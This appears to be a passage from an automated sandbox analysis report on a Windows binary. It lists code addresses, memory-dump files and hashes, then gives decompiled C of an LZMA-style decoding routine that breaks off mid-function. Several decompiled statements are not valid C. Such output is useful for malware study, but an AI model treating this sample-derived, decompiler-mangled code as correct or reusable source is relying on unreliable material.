                                                                                    0x0040647d
                                                                                    0x00406481
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406487
                                                                                    0x0040648b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406491
                                                                                    0x00406493
                                                                                    0x00406497
                                                                                    0x00406497
                                                                                    0x0040649a
                                                                                    0x0040649e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064ee
                                                                                    0x004064f2
                                                                                    0x004064f9
                                                                                    0x004064fc
                                                                                    0x004064ff
                                                                                    0x00406509
                                                                                    0x00000000
                                                                                    0x00406509
                                                                                    0x004064f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406515
                                                                                    0x00406519
                                                                                    0x00406520
                                                                                    0x00406523
                                                                                    0x00406526
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x00406529
                                                                                    0x0040652c
                                                                                    0x0040652f
                                                                                    0x0040652f
                                                                                    0x00406532
                                                                                    0x00406535
                                                                                    0x00406538
                                                                                    0x00406538
                                                                                    0x0040653b
                                                                                    0x00406542
                                                                                    0x00406547
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004065d5
                                                                                    0x004065d5
                                                                                    0x004065d9
                                                                                    0x00406977
                                                                                    0x00000000
                                                                                    0x00406977
                                                                                    0x004065df
                                                                                    0x004065e2
                                                                                    0x004065e5
                                                                                    0x004065e9
                                                                                    0x004065ec
                                                                                    0x004065f2
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f7
                                                                                    0x004065fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061ca
                                                                                    0x004061ca
                                                                                    0x004061ce
                                                                                    0x0040693b
                                                                                    0x00000000
                                                                                    0x0040693b
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x004061da
                                                                                    0x004061de
                                                                                    0x004061e1
                                                                                    0x004061e7
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061ec
                                                                                    0x004061ef
                                                                                    0x004061ef
                                                                                    0x004061f2
                                                                                    0x004061f5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061fb
                                                                                    0x00406201
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406207
                                                                                    0x00406207
                                                                                    0x0040620b
                                                                                    0x0040620e
                                                                                    0x00406211
                                                                                    0x00406214
                                                                                    0x00406217
                                                                                    0x00406218
                                                                                    0x0040621b
                                                                                    0x0040621d
                                                                                    0x00406223
                                                                                    0x00406226
                                                                                    0x00406229
                                                                                    0x0040622c
                                                                                    0x0040622f
                                                                                    0x00406232
                                                                                    0x00406235
                                                                                    0x00406251
                                                                                    0x00406254
                                                                                    0x00406257
                                                                                    0x0040625a
                                                                                    0x00406261
                                                                                    0x00406265
                                                                                    0x00406267
                                                                                    0x0040626b
                                                                                    0x00406237
                                                                                    0x00406237
                                                                                    0x0040623b
                                                                                    0x00406243
                                                                                    0x00406248
                                                                                    0x0040624a
                                                                                    0x0040624c
                                                                                    0x0040624c
                                                                                    0x0040626e
                                                                                    0x00406275
                                                                                    0x00406278
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x00406283
                                                                                    0x00406283
                                                                                    0x00406287
                                                                                    0x00406947
                                                                                    0x00000000
                                                                                    0x00406947
                                                                                    0x0040628d
                                                                                    0x00406290
                                                                                    0x00406293
                                                                                    0x00406297
                                                                                    0x0040629a
                                                                                    0x004062a0
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a5
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062b0
                                                                                    0x004062b3
                                                                                    0x004062b6
                                                                                    0x004062b9
                                                                                    0x004062bc
                                                                                    0x004062bf
                                                                                    0x004062c2
                                                                                    0x004062c5
                                                                                    0x004062c8
                                                                                    0x004062cb
                                                                                    0x004062ce
                                                                                    0x004062e6
                                                                                    0x004062e9
                                                                                    0x004062ec
                                                                                    0x004062ef
                                                                                    0x004062ef
                                                                                    0x004062f2
                                                                                    0x004062f6
                                                                                    0x004062f8
                                                                                    0x004062d0
                                                                                    0x004062d0
                                                                                    0x004062d8
                                                                                    0x004062dd
                                                                                    0x004062df
                                                                                    0x004062e1
                                                                                    0x004062e1
                                                                                    0x004062fb
                                                                                    0x00406302
                                                                                    0x00406305
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00406305
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406347
                                                                                    0x00406347
                                                                                    0x0040634b
                                                                                    0x00406953
                                                                                    0x00000000
                                                                                    0x00406953
                                                                                    0x00406351
                                                                                    0x00406354
                                                                                    0x00406357
                                                                                    0x0040635b
                                                                                    0x0040635e
                                                                                    0x00406364
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406369
                                                                                    0x0040636c
                                                                                    0x0040636c
                                                                                    0x00406372
                                                                                    0x00406310
                                                                                    0x00406310
                                                                                    0x00406313
                                                                                    0x00000000
                                                                                    0x00406313
                                                                                    0x00406374
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x0040637a
                                                                                    0x0040637d
                                                                                    0x00406380
                                                                                    0x00406383
                                                                                    0x00406386
                                                                                    0x00406389
                                                                                    0x0040638c
                                                                                    0x0040638f
                                                                                    0x00406392
                                                                                    0x004063aa
                                                                                    0x004063ad
                                                                                    0x004063b0
                                                                                    0x004063b3
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063ba
                                                                                    0x004063bc
                                                                                    0x00406394
                                                                                    0x00406394
                                                                                    0x0040639c
                                                                                    0x004063a1
                                                                                    0x004063a3
                                                                                    0x004063a5
                                                                                    0x004063a5
                                                                                    0x004063bf
                                                                                    0x004063c6
                                                                                    0x004063c9
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x00406658
                                                                                    0x00406658
                                                                                    0x0040665c
                                                                                    0x00406983
                                                                                    0x00000000
                                                                                    0x00406983
                                                                                    0x00406662
                                                                                    0x00406665
                                                                                    0x00406668
                                                                                    0x0040666c
                                                                                    0x0040666f
                                                                                    0x00406675
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406428
                                                                                    0x00406428
                                                                                    0x0040642b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x0040678d
                                                                                    0x00406790
                                                                                    0x0040679a
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x0040676d
                                                                                    0x00406770
                                                                                    0x00406774
                                                                                    0x00406777
                                                                                    0x00406777
                                                                                    0x0040677a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406824
                                                                                    0x00406828
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x0040684d
                                                                                    0x00406854
                                                                                    0x0040685b
                                                                                    0x0040685b
                                                                                    0x00000000
                                                                                    0x0040685b
                                                                                    0x0040682a
                                                                                    0x0040682d
                                                                                    0x00406830
                                                                                    0x00406833
                                                                                    0x0040683a
                                                                                    0x0040677e
                                                                                    0x0040677e
                                                                                    0x00406781
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406915
                                                                                    0x00406918
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040654f
                                                                                    0x00406551
                                                                                    0x00406558
                                                                                    0x00406559
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406566
                                                                                    0x00406569
                                                                                    0x0040656c
                                                                                    0x0040656e
                                                                                    0x00406570
                                                                                    0x00406570
                                                                                    0x00406571
                                                                                    0x00406574
                                                                                    0x0040657b
                                                                                    0x0040657e
                                                                                    0x0040658c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406862
                                                                                    0x00406862
                                                                                    0x00406865
                                                                                    0x0040686c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406871
                                                                                    0x00406871
                                                                                    0x00406875
                                                                                    0x004069ad
                                                                                    0x00000000
                                                                                    0x004069ad
                                                                                    0x0040687b
                                                                                    0x0040687e
                                                                                    0x00406881
                                                                                    0x00406885
                                                                                    0x00406888
                                                                                    0x0040688e
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406893
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406899
                                                                                    0x00406899
                                                                                    0x0040689d
                                                                                    0x004068fd
                                                                                    0x00406900
                                                                                    0x00406905
                                                                                    0x00406906
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x0040690d
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x00406819
                                                                                    0x0040689f
                                                                                    0x004068a5
                                                                                    0x004068a8
                                                                                    0x004068ab
                                                                                    0x004068ae
                                                                                    0x004068b1
                                                                                    0x004068b4
                                                                                    0x004068b7
                                                                                    0x004068ba
                                                                                    0x004068bd
                                                                                    0x004068c0
                                                                                    0x004068d9
                                                                                    0x004068dc
                                                                                    0x004068df
                                                                                    0x004068e2
                                                                                    0x004068e6
                                                                                    0x004068e8
                                                                                    0x004068e8
                                                                                    0x004068e9
                                                                                    0x004068ec
                                                                                    0x004068c2
                                                                                    0x004068c2
                                                                                    0x004068ca
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d4
                                                                                    0x004068d4
                                                                                    0x004068ef
                                                                                    0x004068f6
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x00406594
                                                                                    0x00406597
                                                                                    0x004065cd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x00406700
                                                                                    0x00406700
                                                                                    0x00406703
                                                                                    0x00406705
                                                                                    0x0040698f
                                                                                    0x00000000
                                                                                    0x0040698f
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406714
                                                                                    0x00406718
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x00000000
                                                                                    0x0040671b
                                                                                    0x00406599
                                                                                    0x0040659b
                                                                                    0x0040659d
                                                                                    0x0040659f
                                                                                    0x004065a2
                                                                                    0x004065a3
                                                                                    0x004065a5
                                                                                    0x004065a7
                                                                                    0x004065aa
                                                                                    0x004065ad
                                                                                    0x004065c3
                                                                                    0x004065c8
                                                                                    0x00406600
                                                                                    0x00406600
                                                                                    0x00406604
                                                                                    0x00406630
                                                                                    0x00406632
                                                                                    0x00406639
                                                                                    0x0040663c
                                                                                    0x0040663f
                                                                                    0x0040663f
                                                                                    0x00406644
                                                                                    0x00406644
                                                                                    0x00406646
                                                                                    0x00406649
                                                                                    0x00406650
                                                                                    0x00406653
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406683
                                                                                    0x00406686
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x00000000
                                                                                    0x004066fa
                                                                                    0x00406688
                                                                                    0x0040668e
                                                                                    0x00406691
                                                                                    0x00406694
                                                                                    0x00406697
                                                                                    0x0040669a
                                                                                    0x0040669d
                                                                                    0x004066a0
                                                                                    0x004066a3
                                                                                    0x004066a6
                                                                                    0x004066a9
                                                                                    0x004066c2
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066c8
                                                                                    0x004066cb
                                                                                    0x004066cd
                                                                                    0x004066d0
                                                                                    0x004066d2
                                                                                    0x004066d4
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066dc
                                                                                    0x004066e0
                                                                                    0x004066e2
                                                                                    0x004066e2
                                                                                    0x004066e3
                                                                                    0x004066e6
                                                                                    0x004066e9
                                                                                    0x004066ab
                                                                                    0x004066ab
                                                                                    0x004066b3
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x004066bd
                                                                                    0x004066bd
                                                                                    0x004066ec
                                                                                    0x004066f3
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x004066f3
                                                                                    0x00406606
                                                                                    0x00406609
                                                                                    0x0040660b
                                                                                    0x0040660e
                                                                                    0x00406611
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661c
                                                                                    0x0040661c
                                                                                    0x0040661f
                                                                                    0x0040661f
                                                                                    0x00406622
                                                                                    0x00406629
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00406629
                                                                                    0x004065af
                                                                                    0x004065b2
                                                                                    0x004065b4
                                                                                    0x004065b7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406316
                                                                                    0x00406316
                                                                                    0x0040631a
                                                                                    0x0040695f
                                                                                    0x00000000
                                                                                    0x0040695f
                                                                                    0x00406320
                                                                                    0x00406323
                                                                                    0x00406326
                                                                                    0x00406329
                                                                                    0x0040632c
                                                                                    0x0040632f
                                                                                    0x00406332
                                                                                    0x00406334
                                                                                    0x00406337
                                                                                    0x0040633a
                                                                                    0x0040633d
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064a1
                                                                                    0x004064a1
                                                                                    0x004064a5
                                                                                    0x0040696b
                                                                                    0x00000000
                                                                                    0x0040696b
                                                                                    0x004064ab
                                                                                    0x004064ae
                                                                                    0x004064b1
                                                                                    0x004064b4
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b9
                                                                                    0x004064bc
                                                                                    0x004064bf
                                                                                    0x004064c2
                                                                                    0x004064c5
                                                                                    0x004064c8
                                                                                    0x004064c9
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064ce
                                                                                    0x004064d1
                                                                                    0x004064d4
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064da
                                                                                    0x004064dc
                                                                                    0x004064dc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406728
                                                                                    0x0040672b
                                                                                    0x0040672e
                                                                                    0x00406731
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406736
                                                                                    0x00406739
                                                                                    0x0040673c
                                                                                    0x0040673f
                                                                                    0x00406742
                                                                                    0x00406745
                                                                                    0x00406746
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674e
                                                                                    0x00406751
                                                                                    0x00406754
                                                                                    0x00406757
                                                                                    0x0040675b
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x00000000
                                                                                    0x004064df
                                                                                    0x00406760
                                                                                    0x00406995
                                                                                    0x004069b7
                                                                                    0x004069bd
                                                                                    0x004069bf
                                                                                    0x004069c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x004069cc
                                                                                    0x004069cc
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                    • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                    • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                    • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
